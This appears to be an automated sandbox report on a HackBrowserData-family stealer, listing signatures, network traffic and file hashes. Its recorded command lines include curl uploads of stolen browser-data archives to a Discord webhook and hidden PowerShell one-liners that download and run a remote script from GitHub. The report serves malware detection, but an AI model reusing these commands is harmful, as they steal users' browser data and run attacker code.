Analysis Overview
SHA256
9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7
Threat Level: Known bad
The file 9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7.zip was found to be: Known bad.
Malicious Activity Summary
An open source browser data exporter written in golang.
Hackbrowserdata family
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Unsigned PE
Browser Information Discovery
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-01-17 06:15
Signatures
An open source browser data exporter written in golang.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Hackbrowserdata family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral10
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
146s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\bdata.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\e.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\exclude.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\file.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\grab.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\m.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\svhost.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3828-0-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp
memory/3828-7-0x000001A3DDFE0000-0x000001A3DE002000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ffo1zloo.uww.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3828-11-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-12-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-13-0x000001A3DE520000-0x000001A3DE6E2000-memory.dmp
memory/3828-14-0x000001A3DEC20000-0x000001A3DF148000-memory.dmp
memory/3828-15-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-16-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-18-0x000001A3C5870000-0x000001A3C587A000-memory.dmp
memory/3828-17-0x000001A3DE070000-0x000001A3DE082000-memory.dmp
memory/3828-20-0x00007FFDC4013000-0x00007FFDC4015000-memory.dmp
memory/3828-21-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bdata.zip
| MD5 | e38d77d89d87d9dc6975a8c52049ba18 |
| SHA1 | 6aee028ef6d2327233466e51dd4c293a28cd43c4 |
| SHA256 | 658991e9ec65890494a0e7051d41f79f2c7fbba978e64cf577c552d1089f295d |
| SHA512 | ebfaaac981a1189864503526de626ae49de3ded78ab464c31fc441e866e894aca10817c7c96a35ee5d113dfc7aaf3ef619205abe9a4b1fafeb1c2ed9e85bf637 |
memory/3828-23-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-24-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
memory/3828-25-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\e.zip
| MD5 | 9a8e90d4abda1500466b8970c6a36982 |
| SHA1 | 057b038c0a91654f5a51e45deb94247e0d7c5e3d |
| SHA256 | 214b9a2f9f18be94fb5ce10b3e4007099d56df2a9978a2175af9fd98c375b7e2 |
| SHA512 | abe05046effb8903a2dcf711ce302a26967e7fa34b9c9488bebaf1aafe0842745488e84417987ab4f2aaffbde8e2dddb4f6116f23124cb5bcfcf3c9c376c1a7e |
C:\Users\Admin\AppData\Local\Temp\exclude.zip
| MD5 | f868c684d24aa6e8c3a1451e00016900 |
| SHA1 | b7c2370e5d4d886df82456708d9e9b6553939286 |
| SHA256 | ea0301e41e0222f736260bebcdf5250fdd6283854837a6c3356221b554e96244 |
| SHA512 | a83e08de2506c61af0fe933265273f05164bcc30e90500c09b518e6b9238330d0cf2db21915b4f4bb0c09f50f41e6b3fcc73a3d883aaa42f4dc60ac4926faa43 |
C:\Users\Admin\AppData\Local\Temp\file.zip
| MD5 | 7ed554c7a827ba84c1d340fe966a2db9 |
| SHA1 | ca39dd825b902a3c853d170312b89a3198e0d67f |
| SHA256 | 6d06797176b04baf550c01724281cc1d1ab5b40d18314c00eb3ae767775ca99c |
| SHA512 | 0490283cba37a2c2cda88976ada55b81a967c6ccd5373445007f7c72f96205cd33bf54341ab298a077a947da8f4d66c387dc0e1ef0ada99505aac40e66d5187d |
C:\Users\Admin\AppData\Local\Temp\grab.zip
| MD5 | 0632e6262f80957d689873cd171ef4eb |
| SHA1 | 59ebd357f65af9b6923c93f4a5d2ab959f674ca9 |
| SHA256 | 5384b0d039f2a3c0a2d0c76aaea6f02f53af13f10d1b059932fbfd686e72f84e |
| SHA512 | 54b7e19fb935fc55f2be6ceb6bbe6205f51c299406db83cd9e14472c89f6be0ff33ab1a217c203d3d873b9d0392c09b8fec7f92012d2a91446998b8ab6b0fb69 |
C:\Users\Admin\AppData\Local\Temp\m.zip
| MD5 | 3e9da8af20794b88518123e7726a1090 |
| SHA1 | d41b522d24cb6d0860702d0fd89b12ec6bcbe056 |
| SHA256 | c984bc8481dc293ba634a76b05f875feda1adaf346fb5d977ff12d6f284443d6 |
| SHA512 | 862021501b0af52bc31f1f71d1136eb6dc586f425a586c5e7b3af433d34b3cc7bbfcc5e4e12f0526c4652f972d12518d59075285c40ca968b9930fb74ceefe42 |
C:\Users\Admin\AppData\Local\Temp\svhost.zip
| MD5 | 2b554843f7216d4fc3966daf6a8d113e |
| SHA1 | ee38847558c8d215357c512d952a3081dd582aea |
| SHA256 | 66d56f48c653b00867af782c7fa90e33213270f2c54b9eeb744058fe2f54e17f |
| SHA512 | f258ef8eb692a7e21ab64cfe80f0e27f82706cbbf97d1aeec3b6fbd34855d9b76ba6fb1796c4e9265e7f5e25aa55c1b6026e369a00aebaeab49eec8d5ff57328 |
memory/3828-40-0x00007FFDC4010000-0x00007FFDC4AD1000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1668 wrote to memory of 2524 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1668 wrote to memory of 2524 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1668 wrote to memory of 2524 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"
Network
Files
memory/2524-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp
memory/2524-5-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/2524-6-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2524-7-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
memory/2524-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240729-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1
Network
Files
memory/2564-4-0x000007FEF5D0E000-0x000007FEF5D0F000-memory.dmp
memory/2564-6-0x0000000002240000-0x0000000002248000-memory.dmp
memory/2564-5-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/2564-7-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
memory/2564-8-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
memory/2564-9-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
memory/2564-10-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2996 wrote to memory of 2308 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2996 wrote to memory of 2308 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2996 wrote to memory of 2308 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"
Network
Files
memory/2308-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp
memory/2308-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2308-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-6-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/2308-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2308-12-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3156 wrote to memory of 4744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3156 wrote to memory of 4744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp |
Files
memory/4744-0-0x00007FFE43D43000-0x00007FFE43D45000-memory.dmp
memory/4744-6-0x000001F6B9E50000-0x000001F6B9E72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mrz2raz5.qay.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4744-11-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-12-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-13-0x000001F6BCC30000-0x000001F6BD3D6000-memory.dmp
memory/4744-15-0x00007FFE43D43000-0x00007FFE43D45000-memory.dmp
memory/4744-16-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-17-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
memory/4744-18-0x00007FFE43D40000-0x00007FFE44801000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1
Network
Files
memory/2072-4-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp
memory/2072-5-0x000000001B820000-0x000000001BB02000-memory.dmp
memory/2072-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2072-7-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-8-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-9-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2072-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1
Network
| Country | Destination | Domain | Proto |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.49.80.91.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 34.197.79.40.in-addr.arpa | udp |
Files
memory/4472-0-0x00007FFCD9873000-0x00007FFCD9875000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42ttdnm0.inb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4472-10-0x000001C9EFD50000-0x000001C9EFD72000-memory.dmp
memory/4472-11-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-12-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-13-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-14-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
memory/4472-15-0x00007FFCD9870000-0x00007FFCDA331000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
147s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
